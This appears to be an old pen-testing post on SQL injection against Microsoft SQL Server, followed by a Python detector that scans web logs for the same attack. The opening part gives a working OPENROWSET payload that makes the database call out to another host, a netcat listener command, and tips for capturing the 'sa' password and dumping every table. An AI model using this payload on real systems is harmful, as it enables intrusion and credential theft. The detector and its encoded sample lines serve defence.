Pen test, SQL Injection

Here's a string you can drop into web form inputs to test whether they're vulnerable to
SQL injection (on Microsoft SQL Server, anyway):

'; select * from OPENROWSET('SQLOLEDB','192.168.0.1';;,'select @@version')--

To verify results, replace the IP address with that of the machine you're testing from,
and use netcat (attached) to listen on port 1433 with the following syntax:

nc -vvv -l -p 1433

If the test is successful, you should see a connection and some garbage characters
in the netcat window. This type of attack is particularly heinous to customers
running Microsoft SQL Server 7/2000. If you replace the 'select @@version' with
another command, you can cause the remote database to try to connect using its
own 'sa' user and password in clear text and capture it with a sniffer.

IF you want to get REALLY tricky, download 'data thief v1.0' and dump all of their
tables in a handy GUI format.
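From the defending side, the same out-of-band OPENROWSET probe is easy to spot in web server logs before any outbound connection on 1433 ever happens. The following detector is an added example, not part of the original post: it URL-decodes each request's query string (twice, to catch double encoding), flags OPENROWSET/OPENDATASOURCE calls that point SQL Server at a remote data source, and separately flags the quote-semicolon-comment tail that closes off the original query. The log lines, IP addresses and paths are constructed for the demonstration.

```python
import re
import urllib.parse

# Constructed combined-format access log lines (made-up hosts and paths).
# Line 2 carries the OPENROWSET probe URL-encoded once; line 4 carries it
# double-encoded, which a single decode pass would miss.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2004:10:15:01 +0000] "GET /search.asp?q=laptop HTTP/1.1" 200 5123
10.0.0.7 - - [12/Mar/2004:10:15:09 +0000] "GET /search.asp?q=%27%3B+select+*+from+OPENROWSET%28%27SQLOLEDB%27%2C%27192.168.0.1%27%3B%3B%2C%27select+%40%40version%27%29-- HTTP/1.1" 500 312
10.0.0.9 - - [12/Mar/2004:10:16:22 +0000] "GET /search.asp?q=openrowset+function+docs HTTP/1.1" 200 4870
10.0.0.7 - - [12/Mar/2004:10:17:40 +0000] "GET /search.asp?q=%2527%253B+select+*+from+OPENROWSET%2528%2527SQLOLEDB%2527%252C%2527192.168.0.1%2527%253B%253B%252C%2527select+%2540%2540version%2527%2529-- HTTP/1.1" 500 312
"""

# A remote-data-source call: provider name followed by a quoted data source.
OOB_PATTERN = re.compile(
    r"\b(OPENROWSET|OPENDATASOURCE)\s*\(\s*'(SQLOLEDB|SQLNCLI|MSDASQL)'\s*,\s*'[^']*'",
    re.IGNORECASE,
)
# Closing quote, statement separator, then a comment that swallows the rest.
TAIL_PATTERN = re.compile(r"'\s*;.*(--|/\*)", re.DOTALL)
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<url>\S+) [^"]*"'
)


def decode_query(url):
    """Return the query string decoded twice so double-encoded payloads surface."""
    query = urllib.parse.urlsplit(url).query
    return urllib.parse.unquote_plus(urllib.parse.unquote_plus(query))


def classify(url):
    """Return tags describing what the request looks like; an empty list means benign."""
    q = decode_query(url)
    tags = []
    if OOB_PATTERN.search(q):
        tags.append("mssql-out-of-band")
    if TAIL_PATTERN.search(q):
        tags.append("sqli-comment-tail")
    return tags


def scan_log(text):
    """Return (client_ip, url, tags) for every log line whose query string matches."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if m:
            tags = classify(m.group("url"))
            if tags:
                hits.append((m.group("ip"), m.group("url"), tags))
    return hits
```

A plain mention of "openrowset" in a search term (line 3) is left alone because the pattern requires the provider and data-source arguments, which keeps the alert rate usable on a busy site.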

http://www.spidynamics.com/whitepapers/Blind_SQLInjection.pdf